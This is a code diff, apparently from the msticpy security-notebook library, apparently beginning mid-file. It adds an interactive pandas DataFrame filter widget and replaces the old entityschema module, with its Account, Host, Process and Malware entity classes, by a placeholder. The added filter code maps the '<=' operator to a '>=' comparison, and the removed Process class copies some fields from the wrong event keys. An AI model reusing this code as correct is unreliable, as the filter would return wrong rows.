+            value="Enter multiple values separated by commas. Strings do not need quotes."
+        )
+        top_row = widgets.VBox(
+            [
+                filt_help_lbl,
+                widgets.HBox(
+                    [
+                        self._col_select,
+                        self._not_cb,
+                        self._oper_sel,
+                        self._filter_value,
+                    ]
+                ),
+            ]
+        )
+        mid_row = widgets.HBox(
+            [
+                self._add_button,
+                self._upd_button,
+            ]
+        )
+        curr_filt_lbl = widgets.Label(value="Current filters")
+        bottom_row = widgets.VBox(
+            [
+                curr_filt_lbl,
+                widgets.HBox(
+                    [
+                        self._curr_filters,
+                        widgets.VBox([self._del_button, self._clear_button]),
+                    ]
+                ),
+            ],
+            **_layout(width="80%", border=True),
+        )
+
+        self.layout = widgets.VBox([top_row, mid_row, bottom_row, self.apply_button])
+
+    def display(self):
+        """Display in IPython."""
+        display(self.layout)
+
+    def _ipython_display_(self):
+        """Display in IPython."""
+        self.display()
+
+    def import_filters(self, filters: Dict[str, FilterExpr]):
+        """
+        Replace the current filters with `filters`.
+
+        Parameters
+        ----------
+        filters : Dict[str, FilterExpr]
+            dict of filter name, FilterExpr
+            FilterExpr is a tuple of:
+            column [str], inv [bool], operator [str], expr [str]
+
+        """
+        self.filters = {
+            f_name: FilterExpr(*f_expr) for f_name, f_expr in filters.items()
+        }
+        self._curr_filters.options = list(filters.keys())
+
+    @property
+    def bool_filters(self):
+        """Return current set of boolean filters."""
+        df_filt = None
+        for filt in self.filters.values():
+            new_filt = self._make_filter(
+                filt.column, filt.operator, filt.expr, filt.inv
+            )
+            new_filt = new_filt.values if isinstance(new_filt, pd.Series) else new_filt
+            df_filt = new_filt if df_filt is None else df_filt & new_filt
+        return df_filt if df_filt is not None else self.data.index.isin(self.data.index)
+
+    @property
+    def filtered_dataframe(self) -> pd.DataFrame:
+        """Return current filtered DataFrame."""
+        return self.data[self.bool_filters]
+
+    def _select_filter(self, change):
+        filter_name = change["new"]
+        if not filter_name:
+            return
+        (
+            self._col_select.value,
+            self._not_cb.value,
+            self._oper_sel.value,
+            self._filter_value.value,
+        ) = self.filters[filter_name]
+
+    def _update_operators(self, change):
+        del change
+        self._oper_sel.options = self._col_operators(self._col_select.value)
+
+    def _add_filter(self, btn):
+        del btn
+        if self._curr_filter_name in self.filters:
+            return
+        self.filters[self._curr_filter_name] = FilterExpr(
+            column=self._col_select.value,
+            inv=self._not_cb.value,
+            operator=self._oper_sel.value,
+            expr=self._filter_value.value,
+        )
+        curr_opts = list(self._curr_filters.options)
+        curr_opts.append(self._curr_filter_name)
+        self._curr_filters.options = curr_opts
+
+    def _update_filter(self, btn):
+        selected_filter = self._curr_filters.value
+        self._add_filter(btn)
+        if selected_filter in self.filters:
+            del self.filters[selected_filter]
+            self._curr_filters.options = list(self.filters.keys())
+
+    def _del_filter(self, btn):
+        del btn
+        selected_filter = self._curr_filters.value
+        if selected_filter in self.filters:
+            del self.filters[selected_filter]
+            self._curr_filters.options = list(self.filters.keys())
+
+    @property
+    def _curr_filter_name(self):
+        not_str = " not " if self._not_cb.value else ""
+        return (
+            f"{self._col_select.value} {not_str}{self._oper_sel.value}"
+            f" '{self._filter_value.value}'"
+        )
+
+    def _clear_filters(self, btn):
+        del btn
+        self.filters.clear()
+        self._curr_filters.options = []
+
+    @property
+    def current_col(self):
+        """Return the currently selected column."""
+        return self._col_select.value
+
+    def _col_operators(self, col):
+        if pd.api.types.is_string_dtype(self.data[col]):
+            return self._OPERATORS["string"]
+        return self._OPERATORS["other"]
+
+    def _make_filter(self, col, operator, expr, not_true):
+        if not_true:
+            return ~self._create_filter(col, operator, expr)
+        return self._create_filter(col, operator, expr)
+
+    # pylint: disable=too-many-return-statements
+    def _create_filter(self, col: str, operator: str, expr: str) -> pd.Series:
+        if operator == "query":
+            return pd.Series(self.data.index.isin(self.data.query(expr).index))
+        if operator in ("in", "between"):
+            return self._filter_in_or_between(col, operator, expr)
+
+        test_expr = self._conv_expr_type(col, expr)
+        if operator == "==":
+            return self.data[col] == test_expr
+        if operator == "contains":
+            return self.data[col].str.contains(test_expr)
+        if operator == "matches":
+            return self.data[col].str.match(test_expr)
+        if operator == ">":
+            return self.data[col] > test_expr
+        if operator == ">=":
+            return self.data[col] >= test_expr
+        if operator == "<":
+            return self.data[col] < test_expr
+        if operator == "<=":
+            return self.data[col] >= test_expr
+        raise TypeError(
+            f"Unsupported operator for operator {operator} and column {col}"
+        )
+
+    def _filter_in_or_between(self, col: str, operator: str, expr: str) -> pd.Series:
+        """Return filter for `in` and `between` operators."""
+        test_expr: List[Union[str, int, float]]
+
+        if pd.api.types.is_string_dtype(self.data[col]):
+            test_expr = [item.strip("\"' ") for item in expr.split(",")]
+        elif pd.api.types.is_numeric_dtype(self.data[col]):
+            test_expr = [
+                int(item) if "." not in item else float(item)
+                for item in expr.split(",")
+            ]
+        elif pd.api.types.is_datetime64_any_dtype(self.data[col]):
+            test_expr = [pd.Timestamp(item.strip()) for item in expr.split(",")]
+        else:
+            raise TypeError(
+                f"Unsupported column type {self.data[col].dtype}",
+                f"for operator {operator} and column {col}",
+            )
+        if operator == "in":
+            return self.data[col].isin(test_expr)
+        if len(test_expr) != 2:
+            raise ValueError(
+                f"Must have two operands for expression {expr}",
+                f"for operator {operator} and column {col}",
+            )
+        return self.data[col].between(test_expr[0], test_expr[1], inclusive="both")
+
+    def _conv_expr_type(self, col: str, expr: str):
+        """Convert string expression to required type."""
+        test_expr: Union[str, int, float]
+        if pd.api.types.is_numeric_dtype(self.data[col]):
+            test_expr = int(expr) if "." not in expr else float(expr)
+        elif pd.api.types.is_datetime64_any_dtype(self.data[col]):
+            test_expr = pd.Timestamp(expr.strip())
+        elif pd.api.types.is_string_dtype(self.data[col]):
+            test_expr = expr.strip("\"' ")
+        else:
+            raise TypeError(
+                f"Unsupported column type {self.data[col].dtype}",
+                f"for column {col}",
+            )
+        return test_expr
+
+
+def _get_col_width(data, col):
+    if data[col].iloc[:10].dropna().empty:
+        return 8
+    if data[col].dtype == "O":
+        return int(data[col].iloc[:10].str.len().mean())
+    if pd.api.types.is_datetime64_any_dtype(data[col]):
+        return 50
+    return 8
+
+
+def _get_cols_from_df(data):
+    """Get list of TableColumn columns from DataFrame."""
+    # save the existing column order
+    col_order = data.columns
+    dt_cols = data.select_dtypes("datetime").columns
+    columns = {
+        col: TableColumn(field=col, title=col, width=_get_col_width(data, col))
+        for col in data.columns
+        if col not in dt_cols
+    }
+
+    date_fmt = "%F %T"
+    dt_columns = {
+        col: TableColumn(
+            field=col,
+            title=col,
+            formatter=DateFormatter(format=date_fmt),
+            width=_get_col_width(data, col),
+        )
+        for col in dt_cols
+    }
+    columns.update(dt_columns)
+    return {col: columns[col] for col in col_order}
diff --git a/msticpy/nbtools/entityschema.py b/msticpy/nbtools/entityschema.py
index fe28e280c..e9cfa5ee1 100644
--- a/msticpy/nbtools/entityschema.py
+++ b/msticpy/nbtools/entityschema.py
@@ -3,1080 +3,12 @@
 # Licensed under the MIT License. See License.txt in the project root for
 # license information.
 # --------------------------------------------------------------------------
-"""
-entityschema module.
+"""Placeholder for old entity_schema module."""
 
-Module for V3 Entities class
-"""
-import ipaddress
-import json
-import pprint
-from abc import ABC, abstractmethod
-from enum import Enum
-
-from . utility import export
-from .. _version import VERSION
+from .._version import VERSION
 
 __version__ = VERSION
-__author__ = 'Ian Hellen'
-
-
-# pylint: disable=invalid-name
-@export
-class Entity(ABC):
-    """
-    Entity abstract base class.
-
-    Implements common methods for Entity classes
-    """
-
-    _entity_schema = {}
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of an entity.
-
-        If src_entity is supplied it attempts to extract common properties
-        from the source entity and assign them to the new instance.
-        """
-        self._entity_properties = {}
-        if src_entity is not None:
-            for k, v in self._entity_schema.items():
-                if k in src_entity:
-                    self[k] = src_entity[k]
-
-                    if v is not None:
-                        try:
-                            if v == RegistryHive.__name__:
-                                self[k] = RegistryHive[src_entity[k]]
-                            elif v == OSFamily.__name__:
-                                self[k] = OSFamily[src_entity[k]]
-                            elif v == ElevationToken.__name__:
-                                self[k] = ElevationToken[src_entity[k]]
-                            elif v == GeoLocation.__name__:
-                                self[k] = GeoLocation[src_entity[k]]
-                            elif v == Algorithm.__name__:
-                                self[k] = Algorithm[src_entity[k]]
-                            elif isinstance(v, tuple):
-                                entity_list = []
-                                for col_entity in src_entity[k]:
-                                    entity_list.append(Entity.instantiate_entity(col_entity))
-                                self[k] = entity_list
-                            else:
-                                self[k] = Entity.instantiate_entity(src_entity[k])
-                        except KeyError:
-                            # Catch key errors from invalid enum values
-                            self[k] = None
-
-            # add AdditionalData dictionary if it's populated
-            if 'AdditionalData' in src_entity:
-                self['AdditionalData'] = src_entity['AdditionalData']
-        elif kwargs:
-            self._entity_properties.update(kwargs)
-
-        # if we didn't populate AdditionalData, add an empty dict in case it's
-        # needed
-        if 'AdditionalData' not in self:
-            self['AdditionalData'] = {}
-
-    def __getitem__(self, key: str):
-        """Allow property get using dictionary key syntax."""
-        if key == 'Type':
-            return self.Type
-        if key in self._entity_properties:
-            return self._entity_properties[key]
-        if key in self.__dict__:
-            return self.__dict__[key]
-        if key in self._entity_schema:
-            return None
-        raise KeyError
-
-    def __setitem__(self, key: str, value: any):
-        """Allow property set using dictionary key syntax."""
-        self._entity_properties[key] = value
-
-    def __contains__(self, key: str):
-        """Allow property in test."""
-        # In operator overload
-        return (key == 'Type' or
-                key in self._entity_properties or
-                key in self.__dict__)
-
-    def __getattr__(self, name: str):
-        """Return the value of the named property 'name'."""
-        if name in self._entity_properties:
-            return self._entity_properties[name]
-        if name in self._entity_schema:
-            return None
-        raise AttributeError(f'{name} is not a valid attribute.')
-
-    def __setattr__(self, name: str, value: any):
-        """Set the value of the named property 'name'."""
-        if name == '_entity_properties':
-            self.__dict__[name] = value
-        else:
-            self._entity_properties[name] = value
-
-    def __iter__(self):
-        """Iterate over entity_properties."""
-        return self._entity_properties.__iter__()
-
-    def __len__(self) -> int:
-        """Return length/number of entity_properties."""
-        return len(self._entity_properties)
-
-    def __str__(self) -> str:
-        """Return string representation of entity."""
-        return pprint.pformat(self._to_dict(self), indent=2, width=100)
-
-    def __repr__(self) -> dict:
-        """Return repr of entity."""
-        return json.dumps(self._to_dict(self), default=self._jdump_default)
-
-    def _to_dict(self, entity) -> dict:
-        """Return as simple nested dictionary."""
-        ent_dict = {}
-        for prop, val in entity.properties.items():
-            if val and prop != 'Type':
-                if isinstance(val, Entity):
-                    ent_dict[prop] = self._to_dict(val)
-                else:
-                    ent_dict[prop] = val
-        ent_dict['Type'] = entity.Type
-        return ent_dict
-
-    @staticmethod
-    def _jdump_default(o):
-        """
-        json.dumps default method.
-
-        Allows it to work (at least not fail) on non-serializable types.
-        """
-        return o.__dict__
-
-    @property
-    def Type(self) -> str:
-        """Return the Entity name (class type)."""
-        return type(self).__name__.lower()
-
-    @property
-    def properties(self) -> dict:
-        """Return dictionary properties of entity."""
-        return self._entity_properties
-
-    @property
-    @abstractmethod
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return self.Type
-
-    @classmethod
-    def instantiate_entity(cls, raw_entity: dict):
-        """
-        Class factory to return entity from raw dictionary representation.
-
-            :param raw_entity:dict:
-        """
-        if 'Type' not in raw_entity:
-            return raw_entity
-
-        if raw_entity['Type'] == 'account':
-            return Account(raw_entity)
-        elif raw_entity['Type'] == 'host':
-            return Host(raw_entity)
-        elif raw_entity['Type'] == 'process':
-            return Process(raw_entity)
-        elif raw_entity['Type'] == 'file':
-            return File(raw_entity)
-        elif raw_entity['Type'] == 'cloudapplication':
-            return CloudApplication(raw_entity)
-        elif raw_entity['Type'] == 'dnsresolve':
-            return DnsResolve(raw_entity)
-        elif (raw_entity['Type'] == 'ipaddress' or
-              raw_entity['Type'] == 'ip'):
-            return IpAddress(raw_entity)
-        elif raw_entity['Type'] == 'networkconnection':
-            return NetworkConnection(raw_entity)
-        elif raw_entity['Type'] == 'malware':
-            return Malware(raw_entity)
-        elif (raw_entity['Type'] == 'registry-key' or
-              raw_entity['Type'] == 'registrykey'):
-            return RegistryKey(raw_entity)
-        elif (raw_entity['Type'] == 'registry-value' or
-              raw_entity['Type'] == 'registryvalue'):
-            return RegistryValue(raw_entity)
-        elif (raw_entity['Type'] == 'host-logon-session' or
-              raw_entity['Type'] == 'hostlogonsession'):
-            return HostLogonSession(raw_entity)
-        elif raw_entity['Type'] == 'filehash':
-            return FileHash(raw_entity)
-        elif (raw_entity['Type'] == 'security-group' or
-              raw_entity['Type'] == 'securitygroup'):
-            return SecurityGroup(raw_entity)
-        elif (raw_entity['Type'] == 'alerts' or
-              raw_entity['Type'] == 'alert'):
-            return Alert(raw_entity)
-
-        raise TypeError(
-            'Could not find a suitable type for {}'.format(raw_entity['Type']))
-
-
-@export
-class Account(Entity):
-    """Account Entity class."""
-
-    def __init__(self, src_entity=None, src_event=None, role='subject', **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param src_event: instantiate entity using properties of src event
-            :param kwargs: key-value pair representation of entity
-        """
-# pylint: disable=locally-disabled, C0301
-        super().__init__(src_entity=src_entity, **kwargs)
-        if src_event is not None:
-            if role == 'subject' and 'SubjectUserName' in src_event:
-                self.Name = src_event['SubjectUserName']
-                self.NTDomain = src_event['SubjectUserDomain'] if 'SubjectUserDomain' in src_event else None
-                self.Sid = src_event['SubjectUserSid'] if 'SubjectUserSid' in src_event else None
-                self.LogonId = src_event['SubjectLogonId'] if 'SubjectLogonId' in src_event else None
-            if role == 'target' and 'TargetUserName' in src_event:
-                self.Name = src_event['TargetUserName']
-                self.NTDomain = src_event['TargetUserDomain'] if 'TargetUserDomain' in src_event else None
-                self.Sid = src_event['TargetUserSid'] if 'TargetUserSid' in src_event else None
-                self.LogonId = src_event['TargetLogonId'] if 'TargetLogonId' in src_event else None
-
-            self.AadTenantId = src_event['AadTenantId'] if 'AadTenantId' in src_event else None
-            self.AadUserId = src_event['AadUserId'] if 'AadUserId' in src_event else None
-            self.PUID = src_event['PUID'] if 'PUID' in src_event else None
-            self.DisplayName = src_event['DisplayName'] if 'DisplayName' in src_event else None
-            self.UPNSuffix = src_event['UPNSuffix'] if 'UPNSuffix' in src_event else None
-# pylint: enable=locally-disabled, C0301
-
-    @property
-    def description_str(self):
-        """Return Entity Description."""
-        return self.qualified_name
-
-    @property
-    def qualified_name(self) -> str:
-        """Windows qualified account name."""
-        if 'Name' in self:
-            name = self['Name']
-        if 'NTDomain' in self and self.NTDomain:
-            return '{}\\{}'.format(self.NTDomain, name)
-        if 'UPNSuffix' in self and self.UPNSuffix:
-            return '{}@{}'.format(name, self.UPNSuffix)
-        if 'Host' in self and self.Host:
-            return '{}\\{}'.format(self.Host.HostName, name)
-        return name
-
-    _entity_schema = {
-        # Name (type System.String)
-        'Name': None,
-        # NTDomain (type System.String)
-        'NTDomain': None,
-        # UPNSuffix (type System.String)
-        'UPNSuffix': None,
-        # Host (type Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.Host)
-        'Host': 'Host',
-        # LogonId (type System.String)
-        'LogonId': None,
-        # Sid (type System.String)
-        'Sid': None,
-        # AadTenantId (type System.Nullable`1[System.Guid])
-        'AadTenantId': None,
-        # AadUserId (type System.Nullable`1[System.Guid])
-        'AadUserId': None,
-        # PUID (type System.Nullable`1[System.Guid])
-        'PUID': None,
-        # IsDomainJoined (type System.Nullable`1[System.Boolean])
-        'IsDomainJoined': None,
-        # DisplayName (type System.String)
-        'DisplayName': None
-    }
-
-
-@export
-class SecurityGroup(Entity):
-    """SecurityGroup Entity class."""
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-    @property
-    def description_str(self):
-        """Return Entity Description."""
-        return self.DistinguishedName
-
-    _entity_schema = {
-        # DistinguishedName (type System.String)
-        'DistinguishedName': None,
-        # SID (type System.String)
-        'SID': None,
-        # ObjectGuid (type System.String)
-        'ObjectGuid': None,
-    }
-
-
-@export
-class HostLogonSession(Entity):
-    """HostLogonSession Entity class."""
-
-    def __init__(self, src_entity=None, src_event=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param src_event: instantiate entity using properties of src event
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-        if src_event is not None:
-            if 'TimeCreatedUtc' in src_event:
-                self.StartTimeUtc = src_event['TimeCreatedUtc']
-            elif 'TimeGenerated' in src_event:
-                self.StartTimeUtc = src_event['TimeGenerated']
-            self.EndTimeUtc = self.StartTimeUtc
-            self.SessionId = src_event['TargetLogonId'] if 'TargetLogonId' in src_event else None
-
-    @property
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return f'{self.Host.HostName}: session: {self.SessionId}'
-
-    _entity_schema = {
-        # Account
-        'Account': 'Account',
-        # StartTimeUtc (type System.Nullable`1[System.DateTime])
-        'StartTimeUtc': None,
-        # EndTimeUtc (type System.Nullable`1[System.DateTime])
-        'EndTimeUtc': None,
-        # Host
-        'Host': 'Host',
-        # SessionId (type System.String)
-        'SessionId': None
-    }
-
-
-@export
-class CloudApplication(Entity):
-    """CloudApplication Entity class."""
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-    @property
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return self.Name
-
-    _entity_schema = {
-        # Name (type System.String)
-        'Name': None
-    }
-
-
-@export
-class DnsResolve(Entity):
-    """DNS Resolve Entity class."""
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-    @property
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return f'{self.DomainName}: IPs: {repr(self.IpAdresses)}'
-
-    _entity_schema = {
-        # DomainName (type System.String)
-        'DomainName': None,
-        # IpAdresses (type System.Collections.Generic.List`1
-        # [Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.IP])
-        'IpAdresses': None,
-        # DnsServerIp (type Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.IP)
-        'DnsServerIp': 'IPAddress',
-        # HostIpAddress (type Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.IP)
-        'HostIpAddress': 'IPAddress'
-    }
-
-
-@export
-class File(Entity):
-    """File Entity class."""
-
-    def __init__(self, src_entity=None, src_event=None, role='new', **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param src_event: instantiate entity using properties of src event
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-        if src_event is not None:
-            if role == 'new' and 'NewProcessName' in src_event:
-                self._add_paths(src_event['NewProcessName'])
-            elif role == 'parent' and 'ParentProcessName' in src_event:
-                self._add_paths(src_event['ParentProcessName'])
-
-        if 'FullPath' not in self._entity_properties:
-            file = self._entity_properties.get('Name', None)
-            directory = self._entity_properties.get('Directory', None)
-            sep = self.path_separator if directory else None
-            self._entity_properties['FullPath'] = f'{directory}{sep}{file}'
-
-    @property
-    def path_separator(self):
-        """Return the path separator used by the file."""
-        if '/' in self._entity_properties.get('Directory', ''):
-            return '/'
-        else:
-            return '\\'
-
-    @property
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return self.FullPath
-
-    _entity_schema = {
-        # FullPath (type System.String)
-        'FullPath': None,
-        # Directory (type System.String)
-        'Directory': None,
-        # Name (type System.String)
-        'Name': None,
-        # Md5 (type System.String)
-        'Md5': None,
-        # Host (type Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.Host)
-        'Host': None,
-        # Sha1 (type System.String)
-        'Sha1': None,
-        # Sha256 (type System.String)
-        'Sha256': None,
-        # Sha256Ac (type System.String)
-        'Sha256Ac': None,
-        'FileHashes': (list, 'FileHash')
-    }
-
-    def _add_paths(self, full_path):
-        if '/' in full_path:
-            self.PathSeparator = '/'
-            self.OSFamily = OSFamily.Linux
-        else:
-            self.PathSeparator = '\\'
-            self.OSFamily = OSFamily.Windows
-
-        self.FullPath = full_path
-        self.Name = full_path.split(self.PathSeparator)[-1]
-        self.Directory = full_path.split(self.PathSeparator)[:-1]
-
-
-@export
-class FileHash(Entity):
-    """File Hash class."""
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-    @property
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return f'{self.Algorithm}: {self.Value}'
-
-    _entity_schema = {
-        # The hash algorithm (type System.String)
-        'Algorithm': 'Algorithm',
-        # Value (type System.String)
-        'Value': None,
-    }
-
-
-@export
-class Algorithm(Enum):
-    """FileHash Algorithm Enumeration."""
-
-    Unknown = 0
-    MD5 = 1
-    SHA1 = 2
-    SHA256 = 3
-    SHA256AC = 4
-
-
-@export
-class Host(Entity):
-    """Host Entity class."""
-
-    def __init__(self, src_entity=None, src_event=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param src_event: instantiate entity using properties of src event
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-        self._computer = None
-        if src_event is not None:
-            if 'Computer' in src_event:
-                self._computer = src_event['Computer']
-                if '.' in src_event['Computer']:
-                    self.HostName = src_event['Computer'].split('.', 1)[0]
-                    self.DnsDomain = src_event['Computer'].split('.', 1)[1]
-                else:
-                    self.HostName = src_event['Computer']
-                self.NetBiosName = self.HostName
-
-    @property
-    def computer(self) -> str:
-        """Return computer from source event."""
-        return self._computer if self._computer is not None else self.fqdn
-
-    @property
-    def fqdn(self) -> str:
-        """Construct FQDN from host + dns."""
-        if self.DnsDomain:
-            return f'{self.HostName}.{self.DnsDomain}'
-        else:
-            return self.HostName
-
-    @property
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return f'{self.fqdn} ({self.OSFamily})'
-
-    _entity_schema = {
-        # DnsDomain (type System.String)
-        'DnsDomain': None,
-        # NTDomain (type System.String)
-        'NTDomain': None,
-        # HostName (type System.String)
-        'HostName': None,
-        # NetBiosName (type System.String)
-        'NetBiosName': None,
-        # AzureID (type System.String)
-        'AzureID': None,
-        # OMSAgentID (type System.String)
-        'OMSAgentID': None,
-        # OSFamily (type System.Nullable`1
-        # [Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.OSFamily])
-        'OSFamily': None,
-        # IsDomainJoined (type System.Nullable`1[System.Boolean])
-        'IsDomainJoined': None
-    }
-
-
-@export
-class IpAddress(Entity):
-    """IPAddress Entity class."""
-
-    def __init__(self, src_entity=None, src_event=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param src_event: instantiate entity using properties of src event
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-        if src_event is not None:
-            if 'IpAddress' in src_event:
-                self.Address = src_event['IpAddress']
-
-    @property
-    def ip_address(self) -> ipaddress:
-        """Return a python ipaddress object from the entity property."""
-        try:
-            return ipaddress.ip_address(self._entity_properties['Address'])
-        except ValueError:
-            return 'Address not convertible.'
-
-    @property
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return self.Address
-
-    _entity_schema = {
-        # Address (type System.String)
-        'Address': None,
-        # Location (type Microsoft.Azure.Security.Detection.AlertContracts
-        # .V3.ContextObjects.GeoLocation)
-        'Location': 'GeoLocation',
-        # ThreatIntelligence (type System.Collections.Generic.List`1
-        # [Microsoft.Azure.Security.Detection.AlertContracts.V3.ContextObjects.ThreatIntelligence])
-        'ThreatIntelligence': None
-    }
-
-
-@export
-class GeoLocation(Entity):
-    """GeoLocation class."""
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-    @property
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return f'{self.CountryCode}; {self.State}; {self.City}'
-
-    _entity_schema = {
-        # str
-        'CountryCode': None,
-        # str
-        'CountryName': None,
-        # str
-        'State': None,
-        # str
-        'City': None,
-        # double?
-        'Longitude': None,
-        # double?
-        'Latitude': None,
-        # int
-        'Asn': None,
-    }
-
-
-@export
-class Malware(Entity):
-    """Malware Entity class."""
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-    @property
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return f'{self.Name}: {self.Category}'
-
-    _entity_schema = {
-        # Name (type System.String)
-        'Name': None,
-        # Category (type System.String)
-        'Category': None,
-        # File (type Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.File)
-        'File': 'File',
-        'Files': (list, 'File'),
-        'Processes': (list, 'Process'),
-    }
-
-
-@export
-class NetworkConnection(Entity):
-    """NetworkConnection Entity class."""
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-    @property
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        desc = '{}:{} [{}]-> {}:{}'.format(self.SourceAddress,
-                                           self.SourcePort,
-                                           self.Protocol,
-                                           self.DestinationAddress,
-                                           self.DestinationPort)
-        return desc
-
-    _entity_schema = {
-        # SourceAddress (type Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.IP)
-        'SourceAddress': 'IPAddress',
-        # SourcePort (type System.Nullable`1[System.Int32])
-        'SourcePort': None,
-        # DestinationAddress (type Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.IP)
-        'DestinationAddress': 'IPAddress',
-        # DestinationPort (type System.Nullable`1[System.Int32])
-        'DestinationPort': None,
-        # Protocol (type System.Nullable`1[System.Net.Sockets.ProtocolType])
-        'Protocol': None
-    }
-
-
-@export
-class Process(Entity):
-    """Process Entity class."""
-
-    def __init__(self, src_entity=None, src_event=None, role='new', **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param src_event: instantiate entity using properties of src event
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-# pylint: disable=locally-disabled, C0301
-        if src_event is not None:
-            if role == "new":
-                self.ProcessId = src_event['NewProcessId'] if 'NewProcessId' in src_event else None
-                self.CommandLine = src_event['CommandLine'] if 'CommandLine' in src_event else None
-                if 'TimeCreatedUtc' in src_event:
-                    self.CreationTimeUtc = src_event['TimeCreatedUtc']
-                elif 'TimeGenerated' in src_event:
-                    self.CreationTimeUtc = src_event['TimeGenerated']
-                self.ProcessId = src_event['NewProcessId'] if 'NewProcessId' in src_event else None
-                self.ImageFile = File(src_event=src_event, role='new')
-                self.Account = Account(src_event=src_event, role='subject')
-
-                self.success = src_event['success'] if 'success' in src_event else None
-                self.audit_user = src_event['audit_user'] if 'audit_user' in src_event else None
-                self.auid = src_event['auid'] if 'auid' in src_event else None
-                self.group = src_event['group'] if 'group' in src_event else None
-                self.gid = src_event['gid'] if 'gid' in src_event else None
-                self.effective_user = src_event['effective_user'] if 'effective_user' in src_event else None
-                self.euid = src_event['euid'] if 'euid' in src_event else None
-                self.effective_group = src_event['effective_group'] if 'effective_group' in src_event else None
-                self.egid = src_event['effective_group'] if 'effective_group' in src_event else None
-                self.cwd = src_event['cwd'] if 'cwd' in src_event else None
-                self.name = src_event['cwd'] if 'cwd' in src_event else None
-            else:
-                self.ProcessId = src_event['ProcessId'] if 'ProcessId' in src_event else None
-                self.ImageFile = File(src_event=src_event, role='parent')
-# pylint: enable=locally-disabled, C0301
-
-    @property
-    def ProcessName(self) -> str:
-        """Return the name of the process file."""
-        file = self._entity_properties.get('ImageFile', None)
-        return file.Name if file else None
-
-    @property
-    def ProcessFilePath(self) -> str:
-        """Return the name of the process file path."""
-        file = self._entity_properties.get('ImageFile', None)
-        return file.FullPath if file else None
-
-    @property
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return f'{self.ProcessFilePath}: {self.CommandLine}'
-
-    _entity_schema = {
-        # ProcessId (type System.String)
-        'ProcessId': None,
-        # CommandLine (type System.String)
-        'CommandLine': None,
-        # ElevationToken (type System.Nullable`1
-        # [Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.ElevationToken])
-        'ElevationToken': None,
-        # CreationTimeUtc (type System.Nullable`1[System.DateTime])
-        'CreationTimeUtc': None,
-        # ImageFile (type Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.File)
-        'ImageFile': 'File',
-        # Account (type Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.Account)
-        'Account': 'Account',
-        # ParentProcess (type Microsoft.Azure.Security.Detection.AlertContracts
-        # .V3.Entities.Process)
-        'ParentProcess': 'Process',
-        # Host (type Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.Host)
-        'Host': 'Host',
-        # Host (type Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.HostLogonSession)
-        'LogonSession': 'HostLogonSession',
-    }
